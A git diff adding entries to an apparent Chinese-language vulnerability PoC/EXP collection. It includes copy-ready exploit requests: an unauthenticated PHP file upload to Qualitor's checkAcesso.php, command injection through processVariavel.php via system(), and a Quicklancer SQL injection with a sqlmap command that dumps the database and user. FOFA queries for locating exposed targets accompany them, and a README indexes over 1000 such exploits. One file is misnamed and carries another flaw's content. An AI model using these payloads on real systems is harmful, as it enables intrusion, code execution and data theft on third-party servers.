name="nmbucket" + + +-----------------------------QUALITORspaceCVEspace2024space44849 +Content-Disposition: form-data; name="nmaccesskey" + + +-----------------------------QUALITORspaceCVEspace2024space44849 +Content-Disposition: form-data; name="nmkeyid" + + +-----------------------------QUALITORspaceCVEspace2024space44849 +Content-Disposition: form-data; name="fleArquivo"; filename="info.php" + +<?php phpinfo();unlink(__FILE__);?> +-----------------------------QUALITORspaceCVEspace2024space44849 +Content-Disposition: form-data; name="cdfilestorage" + + +-----------------------------QUALITORspaceCVEspace2024space44849-- +``` + +![1728639897143-e9d01fec-9808-4387-9707-69da629ae5b7.png](./img/YpPPegF7LDDl-noY/1728639897143-e9d01fec-9808-4387-9707-69da629ae5b7-159864.png) + +```java +/html/ad/adfilestorage/request/info.php +``` + +![1728639914962-87b75123-79a6-425c-867d-eb3debfa671b.png](./img/YpPPegF7LDDl-noY/1728639914962-87b75123-79a6-425c-867d-eb3debfa671b-108101.png) + + + +> 更新: 2024-10-22 
09:36:08 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yiooigqwix8pxlaz> \ No newline at end of file diff --git a/QualitorprocessVariavel.php存在未授权命令注入漏洞.md b/QualitorprocessVariavel.php存在未授权命令注入漏洞.md new file mode 100644 index 0000000..1e2e3ec --- /dev/null +++ b/QualitorprocessVariavel.php存在未授权命令注入漏洞.md @@ -0,0 +1,31 @@ +# Qualitor processVariavel.php存在未授权命令注入漏洞 + +# 一、漏洞简介 +Qualitor processVariavel.php存在未授权命令注入漏洞 + +# 二、影响版本 ++ Qualitor + +# 三、资产测绘 ++ fofa`app="Qualitor-Web"` ++ 特征 + +![1727509167970-d543fa15-b1c4-40b9-91b1-f7e9d6b79657.png](./img/L8aYuzmwqs7PAe-c/1727509167970-d543fa15-b1c4-40b9-91b1-f7e9d6b79657-280269.png) + +# 四、漏洞复现 +```java +GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system("dir"); HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Connection: keep-alive +``` + +![1727509161767-de95985f-2148-44dd-93cb-de328a80fd07.png](./img/L8aYuzmwqs7PAe-c/1727509161767-de95985f-2148-44dd-93cb-de328a80fd07-616639.png) + + + +> 更新: 2024-10-22 09:36:08 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qxvfq9fqnxr606r4> \ No newline at end of file diff --git a/Qualitor系统接口checkAcesso.php任意文件上传漏洞.md b/Qualitor系统接口checkAcesso.php任意文件上传漏洞.md new file mode 100644 index 0000000..26e7bfa --- /dev/null +++ b/Qualitor系统接口checkAcesso.php任意文件上传漏洞.md 
@@ -0,0 +1,53 @@ +# Qualitor系统接口checkAcesso.php任意文件上传漏洞 + +Qualitor系统接口checkAcesso.php任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa + +```javascript +app="Qualitor-Web" +``` + +## poc + +```javascript +POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1 +Host: +Content-Type: multipart/form-data; boundary=---------------------------QUALITORspaceCVEspace2024space44849 + +-----------------------------QUALITORspaceCVEspace2024space44849 +Content-Disposition: form-data; name="idtipo" + +2 +-----------------------------QUALITORspaceCVEspace2024space44849 +Content-Disposition: form-data; name="nmfilestorage" + + +-----------------------------QUALITORspaceCVEspace2024space44849 +Content-Disposition: form-data; name="nmdiretoriorede" + +. +-----------------------------QUALITORspaceCVEspace2024space44849 +Content-Disposition: form-data; name="nmbucket" + + +-----------------------------QUALITORspaceCVEspace2024space44849 +Content-Disposition: form-data; name="nmaccesskey" + + +-----------------------------QUALITORspaceCVEspace2024space44849 +Content-Disposition: form-data; name="nmkeyid" + + +-----------------------------QUALITORspaceCVEspace2024space44849 +Content-Disposition: form-data; name="fleArquivo"; filename="info.php" + +<?php phpinfo();unlink(__FILE__);?> +-----------------------------QUALITORspaceCVEspace2024space44849 +Content-Disposition: form-data; name="cdfilestorage" + + +-----------------------------QUALITORspaceCVEspace2024space44849-- +``` + +![image-20241012131131290](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121311364.png) \ No newline at end of file diff --git a/Qualitor系统接口checkAcesso.php任意文件上传漏洞md b/Qualitor系统接口checkAcesso.php任意文件上传漏洞md new file mode 100644 index 0000000..51b8fdb --- /dev/null +++ b/Qualitor系统接口checkAcesso.php任意文件上传漏洞md 
@@ -0,0 +1,23 @@ +# Qualitor系统接口processVariavel.php未授权命令注入漏洞(CVE-2023-47253) + +Qualitor 8.20及之前版本存在命令注入漏洞,远程攻击者可利用该漏洞通过PHP代码执行任意代码。 + +## fofa + +```javascript +app="Qualitor-Web" +``` + +## poc + +```javascript +GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system("dir"); HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Connection: keep-alive +``` + +![image-20240927201132596](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272011669.png) \ No newline at end of file diff --git a/Qualitor系统接口processVariavel.php未授权命令注入漏洞(CVE-2023-47253).md b/Qualitor系统接口processVariavel.php未授权命令注入漏洞(CVE-2023-47253).md new file mode 100644 index 0000000..51b8fdb --- /dev/null +++ b/Qualitor系统接口processVariavel.php未授权命令注入漏洞(CVE-2023-47253).md @@ -0,0 +1,23 @@ +# Qualitor系统接口processVariavel.php未授权命令注入漏洞(CVE-2023-47253) + +Qualitor 8.20及之前版本存在命令注入漏洞,远程攻击者可利用该漏洞通过PHP代码执行任意代码。 + +## fofa + +```javascript +app="Qualitor-Web" +``` + +## poc + +```javascript +GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system("dir"); HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Connection: keep-alive +``` + +![image-20240927201132596](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272011669.png) \ No newline at end of file diff --git a/Quicklancerlisting存在SQL注入漏洞.md b/Quicklancerlisting存在SQL注入漏洞.md new file mode 100644 index 0000000..09b7cb5 --- /dev/null +++ b/Quicklancerlisting存在SQL注入漏洞.md 
@@ -0,0 +1,33 @@ +# Quicklancer listing存在SQL注入漏洞 + +# 一、漏洞简介 +Quicklancer listing存在SQL注入漏洞 + +# 二、影响版本 ++ Quicklancer + +# 三、资产测绘 ++ fofa`"service_fragments/css/gig_detail.css"` + +![1722357327737-2f75dc76-450b-4762-baaf-f6cb6b6db449.png](./img/Zctu3AEtWqtDqQ_6/1722357327737-2f75dc76-450b-4762-baaf-f6cb6b6db449-311413.png) + +# 四、漏洞复现 +```java +GET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1&salary-type=1&sort=id&subcat= HTTP/1.1 +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Host: +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +``` + +```java +python3 sqlmap.py -r test.txt -p range2 --dbms=mysql --current-db --current-user --batch +``` + +![1722357353437-b723d9d3-47f0-445d-8cae-7a8b96f7c899.png](./img/Zctu3AEtWqtDqQ_6/1722357353437-b723d9d3-47f0-445d-8cae-7a8b96f7c899-327561.png) + + + +> 更新: 2024-08-12 17:15:58 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ggplqb9der0o0i5m> \ No newline at end of file diff --git a/README.md b/README.md index fb40710..1dfca84 100644 --- a/README.md +++ b/README.md 
@@ -1,1122 +1,1225 @@ # 漏洞收集 -收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了900多个poc/exp,善用CTRL+F搜索 +收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了1000多个poc/exp,善用CTRL+F搜索 + +## 2024.09.08 新增漏洞 + +- [智联云采SRM2.0系统接口autologin身份认证绕过漏洞](./智互联科技有限公司/智联云采SRM2.0系统接口autologin身份认证绕过漏洞.md) +- [众诚网上订单系统o_sa_order.ashx存在SQL注入漏洞](./众诚软件/众诚网上订单系统o_sa_order.ashx存在SQL注入漏洞.md) +- [用友NC-Cloud系统show_download_content接口存在SQL注入漏洞](./用友OA/用友NC-Cloud系统show_download_content接口存在SQL注入漏洞.md) +- [Jenkins-Remoting任意文件读取漏洞(CVE-2024-43044)](./Jenkins/Jenkins-Remoting任意文件读取漏洞(CVE-2024-43044).md) +- [WordPress插件GiveWP存在反序列漏洞(CVE-2024-5932)](./WordPress/WordPress插件GiveWP存在反序列漏洞(CVE-2024-5932).md) +- [Apache-OFBiz远程代码执行漏洞(CVE-2024-45195)](./Apache/Apache-OFBiz远程代码执行漏洞(CVE-2024-45195).md) +- [用友U8-Cloud系统接口MultiRepChooseAction存在SQL注入漏洞](./用友OA/用友U8-Cloud系统接口MultiRepChooseAction存在SQL注入漏洞.md) +- [用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞](./用友OA/用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞.md) +- [热网无线监测系统GetMenuItem存在SQL注入漏洞](./热网无线监测系统/热网无线监测系统GetMenuItem存在SQL注入漏洞.md) + +## 2024.09.02 新增漏洞 + +- [蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞](./蜂信物联/蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞.md) +- [紫光电子档案管理系统selectFileRemote存在SQL注入漏洞](./紫光电子档案管理系统/紫光电子档案管理系统selectFileRemote存在SQL注入漏洞.md) +- [中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞](./中兴/中兴ZTE-ZSR-V2系列多业务路由器存在任意文件读取漏洞.md) +- [珠海新华通软件股份有限公司云平台存在登录绕过漏洞](./珠海新华通软件股份有限公司/珠海新华通软件股份有限公司云平台存在登录绕过漏洞.md) +- [Ivanti-Virtual-Traffic-Manager存在身份验证绕过漏洞(CVE-2024-7593)](./Ivanti/Ivanti-Virtual-Traffic-Manager存在身份验证绕过漏洞(CVE-2024-7593).md) +- [浪潮云财务系统UploadListFile存在任意文件上传漏洞](./浪潮云/浪潮云财务系统UploadListFile存在任意文件上传漏洞.md) +- [金和OA-C6系统接口jQueryUploadify.ashx存在SQL注入漏洞](./金和/金和OA-C6系统接口jQueryUploadify.ashx存在SQL注入漏洞.md) +- [用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞](./用友OA/用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞.md) +- [EOVA未授权doInit接口存在反序列化漏洞](./EOVA/EOVA未授权doInit接口存在反序列化漏洞.md) +- [短剧影视小程序前台base64_image_content任意文件上传漏洞](./短剧影视小程序/短剧影视小程序前台base64_image_content任意文件上传漏洞.md) +- 
[短剧影视小程序前台juhecurl任意文件读取漏洞](./短剧影视小程序/短剧影视小程序前台juhecurl任意文件读取漏洞.md) +- [短剧影视小程序前台未授权漏洞](./短剧影视小程序/短剧影视小程序前台未授权漏洞.md) +- [某仿soul欲音社交系统存在任意文件读取漏洞](./社交系统/某仿soul欲音社交系统存在任意文件读取漏洞.md) + +## 2024.08.28 新增漏洞 + +- [朗新天霁智能eHR人力资源管理系统GetE01ByDeptCode存在SQL注入漏洞](./朗新天霁人力资源管理系统/朗新天霁智能eHR人力资源管理系统GetE01ByDeptCode存在SQL注入漏洞.md) +- [全程云OA接口UploadFile存在任意文件上传漏洞](./全程云OA/全程云OA接口UploadFile存在任意文件上传漏洞) +- [Nacos任意文件读写漏洞](./Nacos/Nacos任意文件读写漏洞.md) +- [畅捷通CRM系统newleadset.php接口存在SQL注入漏洞](./用友OA/畅捷通CRM系统newleadset.php接口存在SQL注入漏洞.md) +- [智能停车管理系统GetPasswayData存在SQL注入漏洞](./智能停车管理系统/智能停车管理系统GetPasswayData存在SQL注入漏洞.md) +- [某U挖矿质押单语言系统imageupload后台任意文件上传漏洞](./挖矿质押单语言系统/某U挖矿质押单语言系统imageupload后台任意文件上传漏洞.md) +- [某U挖矿质押单语言系统前台未授权修改管理员密码](./挖矿质押单语言系统/某U挖矿质押单语言系统前台未授权修改管理员密码.md) +- [某U挖矿质押单语言系统后台phar反序列漏洞](./挖矿质押单语言系统/某U挖矿质押单语言系统后台phar反序列漏洞.md) +- [SPIP-porte_plume插件存在任意PHP执行漏洞(CVE-2024-7954)](./SPIP/SPIP-porte_plume插件存在任意PHP执行漏洞(CVE-2024-7954).md) +- [通天星CMSV6车载定位监控平台getAlarmAppealByGuid存在SQL注入漏洞](./通天星/通天星CMSV6车载定位监控平台getAlarmAppealByGuid存在SQL注入漏洞.md) +- [同鑫eHR人力资源管理系统GetFlowDropDownListItems存在SQL注入漏洞](./同鑫eHR/同鑫eHR人力资源管理系统GetFlowDropDownListItems存在SQL注入漏洞.md) + +## 2024.08.24 新增漏洞 + +- [汇智ERP系统Upload.aspx存在文件上传漏洞](./汇智ERP/汇智ERP系统Upload.aspx存在文件上传漏洞.md) +- [超易企业管理系统Login.ashx存在SQL注入漏洞](./超易企业管理系统/超易企业管理系统Login.ashx存在SQL注入漏洞.md) +- [同享人力管理管理平台SFZService.asmx存在SQL注入漏洞](./同享人力管理管理平台/同享人力管理管理平台SFZService.asmx存在SQL注入漏洞.md) +- [九思OA接口WebServiceProxy存在XXE漏洞](./九思OA/九思OA接口WebServiceProxy存在XXE漏洞.md) +- [泛微ecology9系统接口ModeDateService存在SQL漏洞](./泛微OA/泛微ecology9系统接口ModeDateService存在SQL漏洞.md) +- [Oracle-JDEdwards-EnterpriseOne未授权获取管理员密码泄漏](./Oracle/Oracle-JDEdwards-EnterpriseOne未授权获取管理员密码泄漏.md) +- [金和OA-C6协同管理平台DBModules.aspx存在SQL注入漏洞](./金和OA/金和OA-C6协同管理平台DBModules.aspx存在SQL注入漏洞.md) +- [瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞](./瑞斯康达/瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞.md) +- [南京星源图科技SparkShop存在任意文件上传漏洞](./南京星源图科技/南京星源图科技SparkShop存在任意文件上传漏洞.md) +- 
[SeaCMS海洋影视管理系统index.php存在SQL注入漏洞](./海洋cms/SeaCMS海洋影视管理系统index.php存在SQL注入漏洞.md) +- [点企来客服系统getwaitnum存在sql注入漏洞](./点企来客服系统/点企来客服系统getwaitnum存在sql注入漏洞.md) +- [山石网科应用防火墙WAF未授权命令注入漏洞](./山石网科云鉴/山石网科应用防火墙WAF未授权命令注入漏洞.md) +- [用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞](./用友OA/用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞.md) + +## 2024.08.21 新增漏洞 + +- [JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞](./JieLink/JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞.md) +- [正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞](./正方/正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞.md) +- [LiveGBS任意用户密码重置漏洞](./LiveGBS/LiveGBS任意用户密码重置漏洞.md) +- [泛微e-cology-v10远程代码执行漏洞](./泛微OA/泛微e-cology-v10远程代码执行漏洞.md) +- [华夏ERPV3.3存在信息泄漏漏洞](./华夏ERP/华夏ERPV3.3存在信息泄漏漏洞.md) +- [奥威亚云视频平台UploadFile.aspx存在文件上传漏洞](./奥威亚视频云平台/奥威亚云视频平台UploadFile.aspx存在文件上传漏洞.md) +- [万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞](./万户OA/万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞.md) +- [泛微ecology系统接口BlogService存在SQL注入漏洞](./泛微OA/泛微ecology系统接口BlogService存在SQL注入漏洞.md) +- [Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞](./电力系统控制软件/Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞.md) +- [私有云管理平台存在登录绕过漏洞](./私有云管理平台/私有云管理平台存在登录绕过漏洞.md) +- [微商城系统api.php存在文件上传漏洞](./微商城系统/微商城系统api.php存在文件上传漏洞.md) +- [微商城系统goods.php存在SQL注入漏洞](./微商城系统/微商城系统goods.php存在SQL注入漏洞.md) +- [某业务管理系统LoginUser存在信息泄露漏洞](./某业务管理系统/某业务管理系统LoginUser存在信息泄露漏洞.md) + +## 2024.08.17 新增漏洞 + +- [易宝OA-BasicService.asmx存在SQL注入漏洞](./易宝OA/易宝OA-BasicService.asmx存在SQL注入漏洞.md) +- [章管家updatePwd.htm存在任意账号密码重置漏洞](./章管家-印章智慧管理平台/章管家updatePwd.htm存在任意账号密码重置漏洞.md) +- [智慧校园(安校易)管理系统FileUpAd.aspx任意文件上传漏洞](./智慧校园(安校易)管理系统/智慧校园(安校易)管理系统FileUpAd.aspx任意文件上传漏洞.md) +- [用友crm客户关系管理help.php存在任意文件读取漏洞](./用友OA/用友crm客户关系管理help.php存在任意文件读取漏洞.md) +- [方天云智慧平台系统setImg.ashx存在文件上传漏洞](./方天云智慧平台系统/方天云智慧平台系统setImg.ashx存在文件上传漏洞.md) +- [乐享智能运维管理平台getToken存在SQL注入漏洞](./乐享智能运维管理平台/乐享智能运维管理平台getToken存在SQL注入漏洞.md) +- [ZoneMinder系统sort接口存在SQL注入漏洞](./ZoneMinder/ZoneMinder系统sort接口存在SQL注入漏洞.md) +- 
[WookTeam轻量级的团队在线协作系统接口searchinfo存在SQL注入漏洞](./WookTeam轻量级的团队在线协作系统/WookTeam轻量级的团队在线协作系统接口searchinfo存在SQL注入漏洞.md) +- [DeDecms接口sys_verifies.php存在任意文件读取漏洞](./dede/DeDecms接口sys_verifies.php存在任意文件读取漏洞.md) +- [用友U8-CRM系统接口attrlist存在SQL注入漏洞](./用友OA/用友U8-CRM系统接口attrlist存在SQL注入漏洞.md) +- [红海云eHR系统pc.mob存在sql注入漏洞](./红海云eHR/红海云eHR系统pc.mob存在sql注入漏洞.md) +- [用友NC系统FileManager接口存在任意文件上传漏洞](./用友OA/用友NC系统FileManager接口存在任意文件上传漏洞.md) +- [杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞](./杭州三一谦成科技车辆监控服务平台/杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞.md) +- [亿赛通电子文档安全管理系统logincontroller接口存在远程代码执行漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统logincontroller接口存在远程代码执行漏洞.md) +- [亿赛通电子文档安全管理系统getAllUsers身份绕过漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统getAllUsers身份绕过漏洞.md) +- [用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞](./用友OA/用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞.md) +- [用友U8-CRM接口exportdictionary.php存在SQL注入漏洞](./用友OA/用友U8-CRM接口exportdictionary.php存在SQL注入漏洞.md) +- [方正全媒体采编系统存在syn.do信息泄露漏洞](./方正全媒体/方正全媒体采编系统存在syn.do信息泄露漏洞.md) +- [亿赛通电子文档安全管理系统LogDownLoadService存在SQL注入漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统LogDownLoadService存在SQL注入漏洞.md) +- [用友NC接口download存在SQL注入漏洞](./用友OA/用友NC接口download存在SQL注入漏洞.md) +- [科荣AIO管理系统endTime参数存在SQL注入漏洞](./科荣AIO/科荣AIO管理系统endTime参数存在SQL注入漏洞.md) +- [智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞](./智互联科技有限公司/智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞.md) +- [东华医疗协同办公系统templateFile存在任意文件下载漏洞](./东华医疗协同办公系统/东华医疗协同办公系统templateFile存在任意文件下载漏洞.md) +- [智能停车管理系统ToLogin存在SQL注入漏洞](./智能停车管理系统/智能停车管理系统ToLogin存在SQL注入漏洞.md) +- [AVCON-系统管理平台download.action存在任意文件读取漏洞](./AVCON/AVCON-系统管理平台download.action存在任意文件读取漏洞.md) +- [AVCON-网络视频服务系统editusercommit.php存在任意用户重置密码漏洞](./AVCON/AVCON-网络视频服务系统editusercommit.php存在任意用户重置密码漏洞.md) ## 2024.08.13 新增漏洞 -- 用友U8-Cloud系统BusinessRefAction存在SQL注入漏洞 -- 泛微e-office10系统schema_mysql.sql敏感信息泄露漏洞 -- 某短视频直播打赏系统任意文件读取漏洞 -- 某短视频直播打赏系统后台任意文件上传漏洞 -- 章管家listUploadIntelligent接口存在sql注入漏洞 -- 中成科信票务管理系统SeatMapHandler.ashx存在SQL注入漏洞 -- 中成科信票务管理系统TicketManager.ashx存在SQL注入漏洞 -- 
喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞 -- 喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞 -- 喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞 -- 安美数字酒店宽带运营系统weather.php任意文件读取漏洞 -- 赛蓝企业管理系统GetImportDetailJson存在SQL注入漏洞 -- 金斗云HKMP智慧商业软件queryPrintTemplate存在SQL注入漏洞 -- 亿赛通电子文档安全管理系统SecretKeyService存在SQL注入漏洞 -- 润申信息科技ERP系统CommentStandardHandler.ashx接口存在sql注入漏洞 -- 润申信息科技ERP系统DefaultHandler.ashx接口存在sql注入漏洞 +- [用友U8-Cloud系统BusinessRefAction存在SQL注入漏洞](./用友OA/用友U8-Cloud系统BusinessRefAction存在SQL注入漏洞.md) +- [泛微e-office10系统schema_mysql.sql敏感信息泄露漏洞](./泛微OA/泛微e-office10系统schema_mysql.sql敏感信息泄露漏洞.md) +- [某短视频直播打赏系统任意文件读取漏洞](./某短视频直播打赏系统/某短视频直播打赏系统任意文件读取漏洞.md) +- [某短视频直播打赏系统后台任意文件上传漏洞](./某短视频直播打赏系统/某短视频直播打赏系统后台任意文件上传漏洞.md) +- [章管家listUploadIntelligent接口存在sql注入漏洞](./章管家-印章智慧管理平台/章管家listUploadIntelligent接口存在sql注入漏洞.md) +- [中成科信票务管理系统SeatMapHandler.ashx存在SQL注入漏洞](./中成科信票务管理系统/中成科信票务管理系统SeatMapHandler.ashx存在SQL注入漏洞.md) +- [中成科信票务管理系统TicketManager.ashx存在SQL注入漏洞](./中成科信票务管理系统/中成科信票务管理系统TicketManager.ashx存在SQL注入漏洞.md) +- [喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞](./喰星云-数字化餐饮服务系统/喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞.md) +- [喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞](./喰星云-数字化餐饮服务系统/喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞.md) +- [喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞](./喰星云-数字化餐饮服务系统/喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞.md) +- [安美数字酒店宽带运营系统weather.php任意文件读取漏洞](./安美数字酒店宽带运营系统/安美数字酒店宽带运营系统weather.php任意文件读取漏洞.md) +- [赛蓝企业管理系统GetImportDetailJson存在SQL注入漏洞](./赛蓝企业管理系统/赛蓝企业管理系统GetImportDetailJson存在SQL注入漏洞.md) +- [金斗云HKMP智慧商业软件queryPrintTemplate存在SQL注入漏洞](./金斗云/金斗云HKMP智慧商业软件queryPrintTemplate存在SQL注入漏洞.md) +- [亿赛通电子文档安全管理系统SecretKeyService存在SQL注入漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统SecretKeyService存在SQL注入漏洞.md) +- [润申信息科技ERP系统CommentStandardHandler.ashx接口存在sql注入漏洞](./润申信息科技ERP系统/润申信息科技ERP系统CommentStandardHandler.ashx接口存在sql注入漏洞.md) +- [润申信息科技ERP系统DefaultHandler.ashx接口存在sql注入漏洞](./润申信息科技ERP系统/润申信息科技ERP系统DefaultHandler.ashx接口存在sql注入漏洞.md) ## 2024.08.10 新增漏洞 -- H3C-iMC智能管理中心存在远程代码执行漏洞(XVE-2024-4567) -- H3C-iMC智能管理中心autoDeploy.xhtml存在远程代码执行漏洞 -- 
同享人力资源管理系统hdlUploadFile.ashx存在文件上传漏洞 -- 亿赛通电子文档安全管理系统DecryptionApp存在反序列化漏洞 -- 亿赛通电子文档安全管理系统docRenewApp存在反序列化漏洞 -- 亿赛通电子文档安全管理系统SecureUsbConnection存在反序列化漏洞 -- IP网络广播服务平台upload存在任意文件上传漏洞 -- ALR-F800存在命令执行漏洞 -- Atmail存在SQL注入漏洞 -- ELADMIN后台管理系统存在SSRF漏洞 -- JeecgBoot系统AviatorScript表达式注入漏洞 -- Journyx存在未经身份验证的XML外部实体注入 -- Mtab书签导航程序存在SQL注入漏洞 -- 驰骋BPM系统存在SQL注入漏洞 -- 亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在SQL注入漏洞(XVE-2024-19611) -- 赛蓝企业管理系统SubmitUploadify存在任意文件上传漏洞 -- 用友NC系统接口link存在SQL注入漏洞 -- 大华DSS系统group_saveGroup存在SQL注入漏洞 -- H3C-SecPath下一代防火墙local_cert_delete_both存在任意文件上传漏洞 -- 科讯一卡通管理系统DataService.asmx存在SQL注入漏洞 -- 三汇网关管理软件debug.php远程命令执行漏洞 -- 万户ezOFFICE系统graph_include.jsp存在SQL注入漏洞 +- [H3C-iMC智能管理中心存在远程代码执行漏洞(XVE-2024-4567)](./H3C/H3C-iMC智能管理中心存在远程代码执行漏洞(XVE-2024-4567).md) +- [H3C-iMC智能管理中心autoDeploy.xhtml存在远程代码执行漏洞](./H3C/H3C-iMC智能管理中心autoDeploy.xhtml存在远程代码执行漏洞.md) +- [同享人力资源管理系统hdlUploadFile.ashx存在文件上传漏洞](./同享人力管理管理平台/同享人力资源管理系统hdlUploadFile.ashx存在文件上传漏洞.md) +- [亿赛通电子文档安全管理系统DecryptionApp存在反序列化漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统DecryptionApp存在反序列化漏洞.md) +- [亿赛通电子文档安全管理系统docRenewApp存在反序列化漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统docRenewApp存在反序列化漏洞.md) +- [亿赛通电子文档安全管理系统SecureUsbConnection存在反序列化漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统SecureUsbConnection存在反序列化漏洞.md) +- [IP网络广播服务平台upload存在任意文件上传漏洞](./IP网络广播服务平台/IP网络广播服务平台upload存在任意文件上传漏洞.md) +- [ALR-F800存在命令执行漏洞](./路由器/ALR-F800存在命令执行漏洞.md) +- [Atmail存在SQL注入漏洞](./Atmail/Atmail存在SQL注入漏洞.md) +- [ELADMIN后台管理系统存在SSRF漏洞](./ELADMIN/ELADMIN后台管理系统存在SSRF漏洞.md) +- [JeecgBoot系统AviatorScript表达式注入漏洞](./JeecgBoot/JeecgBoot系统AviatorScript表达式注入漏洞.md) +- [Journyx存在未经身份验证的XML外部实体注入](./Journyx/Journyx存在未经身份验证的XML外部实体注入.md) +- [Mtab书签导航程序存在SQL注入漏洞](./Mtab书签导航程序/Mtab书签导航程序存在SQL注入漏洞.md) +- [驰骋BPM系统存在SQL注入漏洞](./驰骋BPM/驰骋BPM系统存在SQL注入漏洞.md) +- [亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在SQL注入漏洞(XVE-2024-19611)](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在SQL注入漏洞(XVE-2024-19611).md) +- 
[赛蓝企业管理系统SubmitUploadify存在任意文件上传漏洞](./赛蓝企业管理系统/赛蓝企业管理系统SubmitUploadify存在任意文件上传漏洞.md) +- [用友NC系统接口link存在SQL注入漏洞](./用友OA/用友NC系统接口link存在SQL注入漏洞.md) +- [大华DSS系统group_saveGroup存在SQL注入漏洞](./大华/大华DSS系统group_saveGroup存在SQL注入漏洞.md) +- [H3C-SecPath下一代防火墙local_cert_delete_both存在任意文件上传漏洞](./H3C/H3C-SecPath下一代防火墙local_cert_delete_both存在任意文件上传漏洞.md) +- [科讯一卡通管理系统DataService.asmx存在SQL注入漏洞](./科讯图书馆综合管理云平台/科讯一卡通管理系统DataService.asmx存在SQL注入漏洞.md) +- [三汇网关管理软件debug.php远程命令执行漏洞](./三汇网关管理软件/三汇网关管理软件debug.php远程命令执行漏洞.md) +- [万户ezOFFICE系统graph_include.jsp存在SQL注入漏洞](./万户OA/万户ezOFFICE系统graph_include.jsp存在SQL注入漏洞.md) ## 2024.08.07 新增漏洞 -- 蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181) -- 世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281) -- 泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞 -- Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856) -- 